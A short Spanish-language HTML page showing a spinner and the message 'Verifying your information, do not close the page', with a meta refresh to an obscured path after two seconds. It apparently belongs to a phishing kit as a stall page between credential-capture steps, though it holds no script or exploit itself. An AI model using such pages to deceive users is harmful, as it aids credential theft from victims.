<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="2; url=/QcEwP85AgNE4pnL5mWSM">
    <link rel="stylesheet" href="./css/main.css">
    <title></title>
</head>
<body>
    <div class="top">
        <img src="./img/otmn-topap.png" alt="">
    </div>

    <div style="display: grid; justify-content: center;">
        <img style="margin-top: 50px; width: 100px; justify-self: center;" src="./img/Rolling-1s-200px (5).svg" alt="">
        <p style="text-align: center;">Verificación de su información. <br> No cierre la página.</p>
    </div>

   
</body>
</html>